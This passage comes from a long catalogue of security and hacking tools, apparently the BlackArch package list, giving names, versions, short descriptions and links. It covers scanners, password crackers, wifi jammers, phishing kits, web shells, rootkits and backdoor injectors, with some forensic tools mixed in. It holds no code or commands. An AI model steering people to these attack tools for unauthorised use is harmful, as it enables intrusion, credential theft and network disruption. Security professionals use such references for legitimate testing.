Firewall/WAF products protecting a website http://code.google.com/p/waffit/ * __wafp 0.01_26c3__ An easy to use Web Application Finger Printing tool written in ruby using sqlite3 databases for storing the fingerprints. http://packetstormsecurity.com/files/84468/Web-Application-Finger-Printer.01-26c3.html * __wapiti 2.3.0__ A vulnerability scanner for web applications. It currently search vulnerabilities like XSS, SQL and XPath injections, file inclusions, command execution, LDAP injections, CRLF injections... http://wapiti.sourceforge.net/ * __wavemon 0.7.6__ Ncurses-based monitoring application for wireless network devices http://eden-feed.erg.abdn.ac.uk/wavemon/ * __web-soul 2__ A plugin based scanner for attacking and data mining web sites written in Perl. http://packetstormsecurity.com/files/122064/Web-Soul-Scanner.html * __webacoo 0.2.3__ Web Backdoor Cookie Script-Kit. https://bechtsoudis.com/webacoo/ * __webenum 0.1__ Tool to enumerate http responses using dynamically generated queries and more. Useful for penetration tests against web servers. http://code.google.com/p/webenum/ * __webhandler 0.8.5__ A handler for PHP system functions & also an alternative 'netcat' handler. https://github.com/lnxg33k/webhandler * __webpwn3r 35.3fb27bb__ A python based Web Applications Security Scanner. https://github.com/zigoo0/webpwn3r * __webrute 3.3__ Web server directory brute forcer. https://github.com/BlackArch/webrute * __webscarab 20120422.001828__ Framework for analysing applications that communicate using the HTTP and HTTPS protocols http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project * __webshag 1.10__ A multi-threaded, multi-platform web server audit tool. http://www.scrt.ch/en/attack/downloads/webshag * __webshells 6.690ebd9__ Web Backdoors. https://github.com/BlackArch/webshells * __webslayer 5__ A tool designed for brute forcing Web Applications https://code.google.com/p/webslayer/ * __websockify__ 0.6.0 WebSocket to TCP proxy/bridge. http://github.com/kanaka/websockify * __webspa 0.7__ A web knocking tool, sending a single HTTP/S to run O/S commands. http://sourceforge.net/projects/webspa/ * __websploit 3.0.0__ An Open Source Project For, Social Engineering Works, Scan, Crawler & Analysis Web, Automatic Exploiter, Support Network Attacks http://code.google.com/p/websploit/ * __weevely 1.1__ Stealth tiny web shell http://epinna.github.io/Weevely/ * __wepbuster 1.0_beta_0.7__ script for automating aircrack-ng http://code.google.com/p/wepbuster/ * __wfuzz 24.1c6ecd8__ Utility to bruteforce web applications to find their not linked resources. https://github.com/xmendez/wfuzz * __whatweb 0.4.7__ Next generation web scanner that identifies what websites are running. http://www.morningstarsecurity.com/research/whatweb * __wi-feye 1.0__ An automated wireless penetration testing tool written in python, its designed to simplify common attacks that can be performed on wifi networks so that they can be executed quickly and easily. http://wi-feye.za1d.com/download.php * __wifi-honey 1.0__ A management tool for wifi honeypots http://www.digininja.org/projects/wifi_honey.php * __wifi-monitor 0.r22.71340a3__ Prints the IPs on your local network that're sending the most packets https://github.com/DanMcInerney/wifi-monitor * __wificurse 0.3.9__ WiFi jamming tool. https://github.com/oblique/wificurse * __wifijammer 43.4a0fe56__ A python script to continuosly jam all wifi clients within range. https://github.com/DanMcInerney/wifijammer * __wifiphisher 17.09cf393__ Fast automated phishing attacks against WPA networks. https://github.com/sophron/wifiphisher * __wifitap 2b16088__ WiFi injection tool through tun/tap device. https://github.com/GDSSecurity/wifitap * __wifite 2.28fc5cd__ A tool to attack multiple WEP and WPA encrypted networks at the same time. http://code.google.com/p/wifite/ * __wig 291.14f19bd__ WebApp Information Gatherer. https://github.com/jekyc/wig * __wikigen 8.348aa99__ A script to generate wordlists out of wikipedia pages. https://github.com/zombiesam/wikigen * __winexe 1.00__ Remotely execute commands on Windows NT/2000/XP/2003 systems. http://sourceforge.net/projects/winexe/ * __winfo 2.0__ Uses null sessions to remotely try to retrieve lists of and information about user accounts, workstation/interdomain/server trust accounts, shares (also hidden), sessions, logged in users, and password/lockout policy, from Windows NT/2000/XP. http://www.ntsecurity.nu/toolbox/winfo/ * __wireless-ids 24.b132071__ Ability to detect suspicious activity such as (WEP/WPA/WPS) attack by sniffing the air for wireless packets. https://github.com/SYWorks/wireless-ids * __wireshark-cli 1.12.2__ a free network protocol analyzer for Unix/Linux and Windows - CLI version http://www.wireshark.org/ * __wireshark-gtk 1.12.2__ a free network protocol analyzer for Unix/Linux and Windows - GTK frontend http://www.wireshark.org/ * __wirouter-keyrec 1.1.2__ A powerful and platform independent software to recover the default WPA passphrases of the supported router models (Telecom Italia Alice AGPF, Fastweb Pirelli, Fastweb Tesley, Eircom Netopia, Pirelli TeleTu/Tele 2). http://www.salvatorefresta.net/tools/ * __witchxtool 1.1__ A perl script that consists of a port scanner, LFI scanner, MD5 bruteforcer, dork SQL injection scanner, fresh proxy scanner, and a dork LFI scanner. http://packetstormsecurity.com/files/97465/Witchxtool-Port-LFI-SQL-Scanner-And-MD5-Bruteforcing-Tool.1.html * __wlan2eth 1.3__ re-writes 802.11 captures into standard Ethernet frames. http://www.willhackforsushi.com/?page_id=79 * __wmat 0.1__ Automatic tool for testing webmail accounts http://netsec.rs/70/tools.html * __wnmap 0.1__ A shell script written with the purpose to automate and chain scans via nmap. You can run nmap with a custom mode written by user and create directories for every mode with the xml/nmap files inside. http://nullsecurity.net/tools/automation.html * __wol-e 2.0__ A suite of tools for the Wake on LAN feature of network attached computers http://code.google.com/p/wol-e/ * __wordpot 37.e42eeda__ A Wordpress Honeypot. https://github.com/gbrindisi/wordpot * __wpbf 7.11b6ac1__ Multithreaded WordPress brute forcer. https://github.com/dejanlevaja/wpbf * __wpscan 1803.88808db__ A vulnerability scanner which checks the security of WordPress installations using a black box approach. http://wpscan.org * __ws-attacker 1.3__ A modular framework for web services penetration testing. http://ws-attacker.sourceforge.net/ * __wsfuzzer 1.9.5__ A Python tool written to automate pentesting of web services. https://www.owasp.org/index.php/Category:OWASP_WSFuzzer_ProjectSOAP * __wyd 0.2__ Gets keywords from personal files. IT security/forensic tool. http://www.remote-exploit.org/?page_id=418 * __x-scan 3.3__ A general network vulnerabilities scanner for scanning network vulnerabilities for specific IP address scope or stand-alone computer by multi-threading method, plug-ins are supportable. http://www.xfocus.org/ * __xcavator 5.bd9e2d8__ Man-In-The-Middle and phishing attack tool that steals the victim's credentials of some web services like Facebook. https://github.com/nccgroup/xcavator * __xf86-video-qxl-git r541.cbe70e9__ Xorg X11 qxl video driver. http://www.spice-space.org/ * __xorbruteforcer 0.1__ Script that implements a XOR bruteforcing of a given file, although a specific key can be used too. http://eternal-todo.com/category/bruteforce * __xorsearch 1.11.1__ Program to search for a given string in an XOR, ROL or ROT encoded binary file. http://blog.didierstevens.com/programs/xorsearch/ * __xortool 0.96__ A tool to analyze multi-byte xor cipher. https://github.com/hellman/xortool/ * __xplico 33.0f6d8bc__ Internet Traffic Decoder. Network Forensic Analysis Tool (NFAT). http://www.xplico.org/ * __xprobe2 0.3__ An active OS fingerprinting tool. http://sourceforge.net/apps/mediawiki/xprobe/index.php?title=Main_Page * __xspy 1.0c__ A utility for monitoring keypresses on remote X servers http://www.freshports.org/security/xspy/ * __xsser 1.6__ A penetration testing tool for detecting and exploiting XSS vulnerabilites. http://xsser.sourceforge.net/ * __xssless 35.9eee648__ An automated XSS payload generator written in python. https://github.com/mandatoryprogrammer/xssless * __xsss 0.40b__ A brute force cross site scripting scanner. http://www.sven.de/xsss/ * __xssscan 8340.db8ef4a__ Command line tool for detection of XSS attacks in URLs. Based on ModSecurity rules from OWASP CRS. https://github.com/gwroblew/detectXSSlib * __xsssniper 0.9__ An automatic XSS discovery tool https://github.com/gbrindisi/xsssniper * __xssya 13.15ebdfe__ A Cross Site Scripting Scanner & Vulnerability Confirmation. https://github.com/yehia-mamdouh/XSSYA * __yara 3.2.0__ A malware identification and classification tool. https://plusvic.github.io/yara/ * __ycrawler 0.1__ A web crawler that is useful for grabbing all user supplied input related to a given website and will save the output. It has proxy and log file support. http://packetstormsecurity.com/files/98546 # Awesome Hacking Tools ___________________________________________________________________________________________________________ * __0trace__ 1.5 A hop enumeration tool http://jon.oberheide.org/0trace/ * __3proxy__ 0.7.1.1 Tiny free proxy server. http://3proxy.ru/ * __3proxy-win32__ 0.7.1.1 Tiny free proxy server. http://3proxy.ru/ * __42zip 42__ Recursive Zip archive bomb. http://blog.fefe.de/?ts=b6cea88d * __acccheck__ 0.2.1 A password dictionary attack tool that targets windows authentication via the SMB protocol. http://labs.portcullis.co.uk/tools/acccheck/ * __ace 1.10__ Automated Corporate Enumerator. A simple yet powerful VoIP Corporate Directory enumeration tool that mimics the behavior of an IP Phone in order to download the name and extension entries that a given phone can display on its screen interface http://ucsniff.sourceforge.net/ace.html * __admid-pack 0.1__ ADM DNS spoofing tools - Uses a variety of active and passive methods to spoof DNS packets. Very powerful. http://packetstormsecurity.com/files/10080/ADMid-pkg.tgz.html * __adminpagefinder 0.1__ This python script looks for a large amount of possible administrative interfaces on a given site. http://packetstormsecurity.com/files/112855/Admin-Page-Finder-Script.html * __admsnmp 0.1__ ADM SNMP audit scanner. * __aesfix 1.0.1__ A tool to find AES key in RAM http://citp.princeton.edu/memory/code/ * __aeskeyfind 1.0__ A tool to find AES key in RAM http://citp.princeton.edu/memory/code/ * __aespipe 2.4c__ Reads data from stdin and outputs encrypted or decrypted results to stdout. http://loop-aes.sourceforge.net/aespipe/ * __afflib 3.7.3__ An extensible open format for the storage of disk images and related forensic information. http://www.afflib.org * __afpfs-ng 0.8.1__ A client for the Apple Filing Protocol (AFP) http://alexthepuffin.googlepages.com/ * __against 0.2__ A very fast ssh attacking script which includes a multithreaded port scanning module (tcp connect) for discovering possible targets and a multithreaded brute-forcing module which attacks parallel all discovered hosts or given ip addresses from a list. http://nullsecurity.net/tools/cracker.html * __aiengine 339.58dfb85__ A packet inspection engine with capabilities of learning without any human intervention. https://bitbucket.org/camp0/aiengine/ * __aimage 3.2.5__ A program to create aff-images. http://www.afflib.org * __air 2.0.0__ A GUI front-end to dd/dc3dd designed for easily creating forensic images. http://air-imager.sourceforge.net/ * __airflood 0.1__ A modification of aireplay that allows for a DOS in in the AP. This program fills the table of clients of the AP with random MACs doing impossible new connections. http://packetstormsecurity.com/files/51127/airflood.1.tar.gz.html * __airgraph-ng 2371__ Graphing tool for the aircrack suite http://www.aircrack-ng.org * __airoscript 45.0a122ee__ A script to simplify the use of aircrack-ng tools. http://midnightresearch.com/projects/wicrawl/ * __airpwn 1.4__ A tool for generic packet injection on an 802.11 network. http://airpwn.sourceforge.net * __allthevhosts 1.0__ A vhost discovery tool that scrapes various web applications http://labs.portcullis.co.uk/tools/finding-all-the-vhosts/ * __american-fuzzy-lop 0.89b__ A practical, instrumentation-driven fuzzer for binary formats. https://code.google.com/p/american-fuzzy-lop/ * __androguard 1.9__ Reverse engineering, Malware and goodware analysis of Android applications and more. https://code.google.com/p/androguard/ * __androick 5.35048d7__ A python tool to help in forensics analysis on android. https://github.com/Flo354/Androick * __android-apktool 1.5.2__ A tool for reengineering Android apk files. http://forum.xda-developers.com/showthread.php?t=1755243 * __android-ndk r9c__ Android C/C++ developer kit. http://developer.android.com/sdk/ndk/index.html * __android-sdk-platform-tools r19__ Platform-Tools for Google Android SDK (adb and fastboot) http://developer.android.com/sdk/index.html * __android-sdk r22.3__ Google Android SDK http://developer.android.com/sdk/index.html * __android-udev-rules 8340.db8ef4a__ Android udev rules. https://github.com/bbqlinux/android-udev-rules * __androidsniffer 0.1__ A perl script that lets you search for 3rd party passwords, dump the call log, dump contacts, dump wireless configuration, and more. http://packetstormsecurity.com/files/97464/Andr01d-Magic-Dumper.1.html * __anontwi 1.0__ A free software python client designed to navigate anonymously on social networks. It supports Identi.ca and Twitter.com. http://anontwi.sourceforge.net/ * __aphopper 0.3__ AP Hopper is a program that automatically hops between access points of different wireless networks. http://aphopper.sourceforge.net/ * __apnbf 0.1__ A small python script designed for enumerating valid APNs (Access Point Name) on a GTP-C speaking device. http://www.c0decafe.de/ * __arachni 1.0.6__ A feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications. https://www.arachni-scanner.com * __arduino 1.0.5__ Arduino SDK (includes patched avrdude and librxtx) http://arduino.cc/en/Main/Software * __argus 3.0.8__ Network monitoring tool with flow control. http://qosient.com/argus/ * __argus-clients 3.0.8__ Network monitoring client for Argus. http://qosient.com/argus/ * __armitage 141120__ A graphical cyber attack management tool for Metasploit. http://www.fastandeasyhacking.com/ * __arp-scan 1.9__ A tool that uses ARP to discover and fingerprint IP hosts on the local network http://www.nta-monitor.com/tools/arp-scan/ * __arpalert 2.0.12__ Monitor ARP changes in ethernet networks http://www.arpalert.org/ * __arpantispoofer 1.0.1.32__ A utility to detect and resist BIDIRECTIONAL ARP spoofing. It can anti-spoof for not only the local host, but also other hosts in the same subnet. It is also a handy helper for gateways which don't work well with ARP. http://arpantispoofer.sourceforge.net/ * __arpoison 0.6__ The UNIX arp cache update utility http://www.arpoison.net * __arpon 2.7__ A portable handler daemon that make ARP protocol secure in order to avoid the Man In The Middle (MITM) attack through ARP Spoofing, ARP Cache Poisoning or ARP Poison Routing (APR) attacks. http://arpon.sourceforge.net/ * __arpwner 26.f300fdf__ GUI-based python tool for arp posioning and dns poisoning attacks. https://github.com/ntrippar/ARPwner * __artillery 1.0.2__ A combination of a honeypot, file-system monitoring, system hardening, and overall health of a server to create a comprehensive way to secure a system https://www.trustedsec.com/downloads/artillery/ * __asleap 2.2__ Actively recover LEAP/PPTP passwords. http://www.willhackforsushi.com/Asleap.html * __asp-audit 2BETA__ An ASP fingerprinting tool and vulnerability scanner. http://seclists.org/basics/2006/Sep/128 * __athena-ssl-scanner 0.5.2__ a SSL cipher scanner that checks all cipher codes. It can identify about 150 different ciphers. http://packetstormsecurity.com/files/93062/Athena-SSL-Cipher-Scanner.html * __atstaketools 0.1__ This is an archive of various @Stake tools that help perform vulnerability scanning and analysis, information gathering, password auditing, and forensics. http://packetstormsecurity.com/files/50718/AtStakeTools.zip.html * __auto-xor-decryptor 3.6a1f8f7__ Automatic XOR decryptor tool. http://www.blog.mrg-effitas.com/publishing-of-mrg-effitas-automatic-xor-decryptor-tool/ * __autopsy 2.24__ A GUI for The Sleuth Kit. http://www.sleuthkit.org/autopsy * __azazel 10.401e3aa__ A userland rootkit based off of the original LD_PRELOAD technique from Jynx rootkit. https://github.com/chokepoint/azazel * __b2sum 20140114__ BLAKE2 file hash sum check. Computes the BLAKE2 (BLAKE2b or -s, -bp, -sp) cryptographic hash of a given file. https://blake2.net/ * __backcookie 44.cbf5b8b__ Small backdoor using cookie. https://github.com/mrjopino/backcookie * __backdoor-factory 98.89d87b2__ Patch win32/64 binaries with shellcode. https://github.com/secretsquirrel/the-backdoor-factory * __backfuzz 36.8e54ed6__ A network protocol fuzzing toolkit. https://github.com/localh0t/backfuzz * __balbuzard 65.546c5dcf629c__ A package of malware analysis tools in python to extract patterns of interest from suspicious files (IP addresses, domain names, known file headers, interesting strings, etc). https://bitbucket.org/decalage/balbuzard/ * __bamf-framework 35.30d2b4b__ A modular framework designed to be a platform to launch attacks against botnets. https://github.com/bwall/BAMF * __basedomainname 0.1__ Tool that can extract TLD (Top Level Domain), domain extensions (Second Level Domain + TLD), domain name, and hostname from fully qualified domain names. http://www.morningstarsecurity.com/research * __batman-adv 2013.4.0__ batman kernel module, (included upstream since .38) http://www.open-mesh.net/ * __bbqsql 1.2__ SQL injection exploitation tool. https://github.com/neohapsis/bbqsql * __bdfproxy 38.43e83e4__ Patch Binaries via MITM: BackdoorFactory + mitmProxy https://github.com/secretsquirrel/BDFProxy * __bed 0.5__ Collection of scripts to test for buffer overflows, format string vulnerabilities. http://www.aldeid.com/wiki/Bed * __beef 0.4.5.0.181.g80a9f8e__ The Browser Exploitation Framework that focuses on the web browser http://beefproject.com/ * __beholder 0.8.9__ A wireless intrusion detection tool that looks for anomalies in a wifi environment. http://www.beholderwireless.org/ * __beleth 36.0963699__ A Multi-threaded Dictionary based SSH cracker. https://github.com/chokepoint/Beleth * __bfbtester 2.0.1__ Performs checks of single and multiple argument command line overflows and environment variable overflows http://sourceforge.net/projects/bfbtester/ * __bgp-md5crack 0.1__ RFC2385 password cracker http://www.c0decafe.de/ * __bing-ip2hosts 0.4__ Enumerates all hostnames which Bing has indexed for a specific IP address. http://www.morningstarsecurity.com/research/bing-ip2hosts * __bing-lfi-rfi 0.1__ This is a python script for searching Bing for sites that may have local and remote file inclusion vulnerabilities. http://packetstormsecurity.com/files/121590/Bing-LFI-RFI-Scanner.html * __binwalk 2.0.1__ A tool for searching a given binary image for embedded files. http://binwalk.org * __binwally 3.ca092a7__ Binary and Directory tree comparison tool using the Fuzzy Hashing concept (ssdeep). https://github.com/bmaia/binwally * __bios_memimage 1.2__ A tool to dump RAM contents to disk (aka cold boot attack). http://citp.princeton.edu/memory/code/ * __birp 60.1d7c49f__ A tool that will assist in the security assessment of mainframe applications served over TN3270. https://github.com/sensepost/birp * __bittwist 2.0__ A simple yet powerful libpcap-based Ethernet packet generator. It is designed to complement tcpdump, which by itself has done a great job at capturing network traffic. http://bittwist.sourceforge.net/ * __bkhive 1.1.1__ Program for dumping the syskey bootkey from a Windows NT/2K/XP system hive. http://sourceforge.net/projects/ophcrack * __blackarch-menus 0.2__ BlackArch specific XDG-compliant menu http://www.blackarch.org/ * __blackhash 0.2__ Creates a filter from system hashes http://16s.us/blackhash/ * __bletchley 0.0.1__ A collection of practical application cryptanalysis tools. https://code.google.com/p/bletchley/ * __blindelephant 7__ A web application fingerprinter. Attempts to discover the version of a (known) web application by comparing static files at known locations http://blindelephant.sourceforge.net/ * __blindsql 1.0__ Set of bash scripts for blind SQL injection attacks http://www.enye-sec.org/programas.html * __bluebox-ng 66.4a73bb4__ A GPL VoIP/UC vulnerability scanner. https://github.com/jesusprubio/bluebox-ng * __bluebugger 0.1__ An implementation of the bluebug technique which was discovered by Martin Herfurt. http://packetstormsecurity.com/files/54024/bluebugger.1.tar.gz.html * __bluelog 1.1.1__ A Bluetooth scanner and sniffer written to do a single task, log devices that are in discoverable mode. http://www.digifail.com/software/bluelog.shtml * __bluepot 0.1__ A Bluetooth Honeypot written in Java, it runs on Linux https://code.google.com/p/bluepot/ * __blueprint 0.1_3__ A perl tool to identify Bluetooth devices. http://trifinite.org/trifinite_stuff_blueprinting.html * __blueranger 1.0__ A simple Bash script which uses Link Quality to locate Bluetooth device radios. http://www.hackfromacave.com/projects/blueranger.html * __bluesnarfer 0.1__ A bluetooth attacking tool http://www.alighieri.org/project.html * __bmap-tools 3.2__ Tool for copying largely sparse files using information from a block map file. http://git.infradead.org/users/dedekind/bmap-tools.git * __bob-the-butcher 0.7.1__ A distributed password cracker package. http://btb.banquise.net/ * __bokken 376.caaa65c431a8__ GUI for radare2 and pyew. http://inguma.eu/projects/bokken/ * __bowcaster 0.1__ This framework, implemented in Python, is intended to aid those developing exploits by providing useful set of tools and modules, such as payloads, encoders, connect-back servers, etc. Currently the framework is focused on the MIPS CPU architecture, but the design is intended to be modular enough to support arbitrary architectures. https://github.com/zcutlip/bowcaster * __braa 0.82__ A mass snmp scanner http://s-tech.elsat.net.pl/braa/ * __braces 0.4__ A Bluetooth Tracking Utility. http://braces.shmoo.com/ * __browser-fuzzer__ 3 Browser Fuzzer 3 http://www.krakowlabs.com/dev.html * __brutessh 0.5__ A simple sshd password bruteforcer using a wordlist, it's very fast for internal networks. It's multithreads. http://www.edge-security.com/edge-soft.php * __brutus 2__ One of the fastest, most flexible remote password crackers you can get your hands on. http://www.hoobie.net/brutus/ * __bsdiff 4.3__ bsdiff and bspatch are tools for building and applying patches to binary files. http://www.daemonology.net/bsdiff/ * __bsqlbf 2.7__ Blind SQL Injection Brute Forcer. http://code.google.com/p/bsqlbf-v2/ * __bss 0.8__ Bluetooth stack smasher / fuzzer http://www.secuobs.com/news/15022006-bss_0_8.shtml * __bt_audit 0.1.1__ Bluetooth audit http://www.betaversion.net/btdsd/download/ * __btcrack 1.1__ The world's first Bluetooth Pass phrase (PIN) bruteforce tool. Bruteforces the Passkey and the Link key from captured Pairing exchanges. http://www.nruns.com/_en/security_tools_btcrack.php * __btscanner 2.1__ Bluetooth device scanner. http://www.pentest.co.uk * __bulk-extractor 1.5.5__ Bulk Email and URL extraction tool. https://github.com/simsong/bulk_extractor * __bully 19.ba33677__ A wifi-protected-setup (WPS) brute force attack tool. http://code.google.com/p/bully/ * __bunny 0.93__ A closed loop, high-performance, general purpose protocol-blind fuzzer for C programs. http://code.google.com/p/bunny-the-fuzzer/ * __burpsuite 1.6__ An integrated platform for attacking web applications (free edition). http://portswigger.net/burp/ * __buttinsky 138.1a2a1b2__ Provide an open source framework for automated botnet monitoring. https://github.com/buttinsky/buttinsky * __bvi 1.4.0beta__ A display-oriented editor for binary files operate like "vi" editor. http://bvi.sourceforge.net/ * __cadaver 0.23.3__ Command-line WebDAV client for Unix http://www.webdav.org/cadaver * __canari 1.1__ A transform framework for maltego http://www.canariproject.com/ * __cansina 93.abc6577__ A python-based Web Content Discovery Tool. https://github.com/deibit/cansina * __capstone 3.0__ A lightweight multi-platform, multi-architecture disassembly framework. http://www.capstone-engine.org/index.html * __carwhisperer 0.2__ Intends to sensibilise manufacturers of carkits and other Bluetooth appliances without display and keyboard for the possible security threat evolving from the use of standard passkeys. http://trifinite.org/trifinite_stuff_carwhisperer.html * __casefile 1.0.1__ The little brother to Maltego without transforms, but combines graph and link analysis to examine links between manually added data to mind map your information http://www.paterva.com/web6/products/casefile.php * __cdpsnarf 0.1.6__ Cisco discovery protocol sniffer. https://github.com/Zapotek/cdpsnarf * __cecster 5.15544cb__ A tool to perform security testing against the HDMI CEC (Consumer Electronics Control) and HEC (HDMI Ethernet Channel) protocols https://github.com/nccgroup/CECster * __centry 72.6de2868__ Cold boot & DMA protection https://github.com/0xPoly/Centry * __cewl 4.3__ A custom word list generator http://www.digininja.org/projects/cewl.php * __cflow 1.4__ A C program flow analyzer. http://www.gnu.org/software/cflow/ * __chaosmap 1.3__ An information gathering tool and dns / whois / web server scanner http://freecode.com/projects/chaosmap * __chaosreader 0.94__ A freeware tool to trace tcp, udp etc. sessions and fetch application data from snoop or tcpdump logs. http://chaosreader.sourceforge.net/ * __chapcrack 17.ae2827f__ A tool for parsing and decrypting MS-CHAPv2 network handshakes. https://github.com/moxie0/chapcrack * __check-weak-dh-ssh 0.1__ Debian OpenSSL weak client Diffie-Hellman Exchange checker. http://packetstormsecurity.com/files/66683/check_weak_dh_ssh.pl.bz2.html * __checkiban 0.2__ Checks the validity of an International Bank Account Number (IBAN). http://kernel.embedromix.ro/us/ * __checkpwd 1.23__ Oracle Password Checker (Cracker) http://www.red-database-security.com/software/checkpwd.html * __checksec 1.5__ The checksec.sh script is designed to test what standard Linux OS and PaX security features are being used. http://www.trapkit.de/tools/checksec.html * __chiron 0.7__ An all-in-one IPv6 Penetration Testing Framework. http://www.secfu.net/tools-scripts/ * __chkrootkit 0.50__ Checks for rootkits on a system http://www.chkrootkit.org/ * __chntpw 140201__ Offline NT Password Editor - reset passwords in a Windows NT SAM user database file http://pogostick.net/~pnh/ntpasswd/ * __chownat 0.08b__ Allows two peers behind two separate NATs with no port forwarding and no DMZ setup on their routers to directly communicate with each other http://samy.pl/chownat/ * __chrome-decode 0.1__ Chrome web browser decoder tool that demonstrates recovering passwords. http://packetstormsecurity.com/files/119153/Chrome-Web-Browser-Decoder.html * __chromefreak 22.336e323__ A Cross-Platform Forensic Framework for Google Chrome http://osandamalith.github.io/ChromeFreak/ * __cidr2range 0.9__ Script for listing the IP addresses contained in a CIDR netblock http://www.cpan.org/authors/id/R/RA/RAYNERLUC * __ntruder 0.2.0__ An automatic pentesting tool to bypass captchas. http://cintruder.sourceforge.net/ * __ciphertest 14.7f49ea7__ A better SSL cipher checker using gnutls. https://github.com/OpenSecurityResearch/ciphertest * __cirt-fuzzer 1.0__ A simple TCP/UDP protocol fuzzer. http://www.cirt.dk/ * __cisco-auditing-tool 1__ Perl script which scans cisco routers for common vulnerabilities. Checks for default passwords, easily guessable community names, and the IOS history bug. Includes support for plugins and scanning multiple hosts. http://www.scrypt.net * __cisco-global-exploiter 1.3__ A perl script that targets multiple vulnerabilities in the Cisco Internetwork Operating System (IOS) and Catalyst products. http://www.blackangels.it * __cisco-ocs 0.2__ Cisco Router Default Password Scanner. http://www.question-defense.com/2013/01/11/ocs-version-2-release-ocs-cisco-router-default-password-scanner * __cisco-router-config 1.1__ copy-router-config and merge-router-config to copy and merge Cisco Routers Configuration * __cisco-scanner 0.2__ Multithreaded Cisco HTTP vulnerability scanner. Tested on Linux, OpenBSD and Solaris. http://wayreth.eu.org/old_page/ * __cisco-torch 0.4b__ Cisco Torch mass scanning, fingerprinting, and exploitation tool. http://www.arhont.com * __cisco5crack 2.c4b228c__ Crypt and decrypt the cisco enable 5 passwords. https://github.com/madrisan/cisco7crack * __cisco7crack 2.f1c21dd__ Crypt and decrypt the cisco enable 7 passwords. https://github.com/madrisan/cisco7crack * __ciscos 1.3__ Scans class A, B, and C networks for cisco routers which have telnet open and have not changed the default password from cisco. * __climber 23.f614304__ Check UNIX/Linux systems for privilege escalation. https://github.com/raffaele-forte/climber * __clusterd 129.0f04a49__ Automates the fingerprinting, reconnaissance, and exploitation phases of an application server attack. https://github.com/hatRiot/clusterd * __cmospwd 5.0__ Decrypts password stored in CMOS used to access BIOS setup. http://www.cgsecurity.org/wiki/CmosPwd * __cms-explorer 1.0__ Designed to reveal the specific modules, plugins, components and themes that various cms driven websites are running http://code.google.com/p/cms-explorer * __cms-few 0.1__ Joomla, Mambo, PHP-Nuke, and XOOPS CMS SQL injection vulnerability scanning tool written in Python. http://packetstormsecurity.com/files/64722/cms_few.py.txt.html * __codetective 37.f94d9e8__ A tool to determine the crypto/encoding algorithm used according to traces of its representation. https://www.digitalloft.org/init/plugin_wiki/page/codetective * __complemento 0.7.6__ A collection of tools for pentester: LetDown is a powerful tcp flooder ReverseRaider is a domain scanner that use wordlist scanning or reverse resolution scanning Httsquash is an http server scanner, banner grabber and data retriever http://complemento.sourceforge.net * __conpot 0.3.1__ ICS honeypot with the goal to collect intelligence about the motives and methods of adversaries targeting industrial control systems url="http://conpot.org" * __conscan 1.1__ A blackbox vulnerability scanner for the Concre5 CMS. http://nullsecurity.net/tools/scanner.html * __cookie-cadger 1.07__ An auditing tool for Wi-Fi or wired Ethernet connections. https://cookiecadger.com/ * __cowpatty 4.6__ Wireless WPA/WPA2 PSK handshake cracking utility http://www.wirelessdefence.org/Contents/Files/ * __cpfinder 0.1__ This is a simple script that looks for administrative web interfaces. http://packetstormsecurity.com/files/118851/Control-Panel-Finder-Script.html * __cppcheck 1.67__ A tool for static C/C++ code analysis http://cppcheck.wiki.sourceforge.net/ * __cpptest 1.1.2__ A portable and powerful, yet simple, unit testing framework for handling automated tests in C++. http://cpptest.sourceforge.net/ * __crackhor 2.ae7d83f__ A Password cracking utility. https://github.com/CoalfireLabs/crackHOR * __crackle 39.3e93196__ Crack and decrypt BLE encryption https://github.com/mikeryan/crackle/ * __crackserver 31.c268a80__ An XMLRPC server for password cracking. https://github.com/averagesecurityguy/crack * __create-ap 112.1c89b44__ This script creates a NATed or Bridged WiFi Access Point. https://github.com/oblique/create_ap * __creddump 0.3__ A python tool to extract various credentials and secrets from Windows registry hives. https://code.google.com/p/creddump/ * __creds 8340.db8ef4a__ Harvest FTP/POP/IMAP/HTTP/IRC credentials along with interesting data from each of the protocols. https://github.com/DanMcInerney/creds.py * __creepy 137.9f60449__ A geolocation information gatherer. Offers geolocation information gathering through social networking platforms. http://github.com/ilektrojohn/creepy.git * __crunch 3.6__ A wordlist generator for all combinations/permutations of a given character set. http://sourceforge.net/projects/crunch-wordlist/ * __cryptcat 1.2.1__ A lightweight version of netcat with integrated transport encryption capabilities. http://sourceforge.net/projects/cryptcat * __crypthook__ 17.0728cd1 TCP/UDP symmetric encryption tunnel wrapper. https://github.com/chokepoint/CryptHook * __cryptonark 0.4.9__ SSL security checker. http://blog.techstacks.com/cryptonark.html * __csrftester 1.0__ The OWASP CSRFTester Project attempts to give developers the ability to test their applications for CSRF flaws. http://www.owasp.org/index.php/Category:OWASP_CSRFTester_Project * __ctunnel 0.6__ Tunnel and/or proxy TCP or UDP connections via a cryptographic tunnel. http://nardcore.org/ctunnel * __cuckoo 1.1.1__ A malware analysis system. http://cuckoosandbox.org/ * __cupp 3.0__ Common User Password Profiler http://www.remote-exploit.org/?page_id=418 * __cutycapt 10__ A Qt and WebKit based command-line utility that captures WebKit's rendering of a web page. http://cutycapt.sourceforge.net/ * __cvechecker 3.5__ The goal of cvechecker is to report about possible vulnerabilities on your system, by scanning the installed software and matching the results with the CVE database. http://cvechecker.sourceforge.net/ * __cymothoa 1__ A stealth backdooring tool, that inject backdoor's shellcode into an existing process. http://cymothoa.sourceforge.net/ * __darkbing 0.1__ A tool written in python that leverages bing for mining data on systems that may be susceptible to SQL injection. http://packetstormsecurity.com/files/111510/darkBing-SQL-Scanner.1.html * __darkd0rk3r 1.0__ Python script that performs dork searching and searches for local file inclusion and SQL injection errors. http://packetstormsecurity.com/files/117403/Dark-D0rk3r.0.html * __darkjumper 5.8__ This tool will try to find every website that host at the same server at your target http://sourceforge.net/projects/darkjumper/ * __darkmysqli 1.6__ Multi-Purpose MySQL Injection Tool https://github.com/BlackArch/darkmysqli * __darkstat 3.0.718__ Network statistics gatherer (packet sniffer) http://dmr.ath.cx/net/darkstat/ * __davoset 1.2.3__ A tool for using Abuse of Functionality and XML External Entities vulnerabilities on some websites to attack other websites. http://websecurity.com.ua/davoset/ * __davtest 1.0__ Tests WebDAV enabled servers by uploading test executable files, and then (optionally) uploading files which allow for command execution or other actions directly on the target http://code.google.com/p/davtest/ * __dbd 1.50__ A Netcat-clone, designed to be portable and offer strong encryption. It runs on Unix-like operating systems and on Microsoft Win32. https://github.com/gitdurandal/dbd * __dbpwaudit 0.8__ A Java tool that allows you to perform online audits of password quality for several database engines 